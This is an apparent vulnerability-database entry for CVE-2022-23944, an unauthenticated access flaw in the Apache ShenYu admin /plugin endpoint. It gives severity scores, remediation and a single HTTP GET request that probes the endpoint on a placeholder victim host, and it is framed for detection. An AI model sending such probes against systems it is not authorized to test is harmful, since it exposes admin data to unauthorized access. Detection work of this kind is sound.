🔙 목록으로 돌아가기

CVE-2022-23944: Apache ShenYu Admin Unauth Access

TitleApache ShenYu Admin Unauth Access
Authorcckuakilong
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Apache ShenYu admin panel.
RemediationUpgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
CVSS Score9.1
EPSS Score0.90239
CVE IDCVE-2022-23944
CWE IDCWE-306,CWE-862
Tags cve cve2022 shenyu unauth apache vuln

🔍 Vulnerability Description

Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

🌐 HTTP Request

GET /plugin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23944.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-23944.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A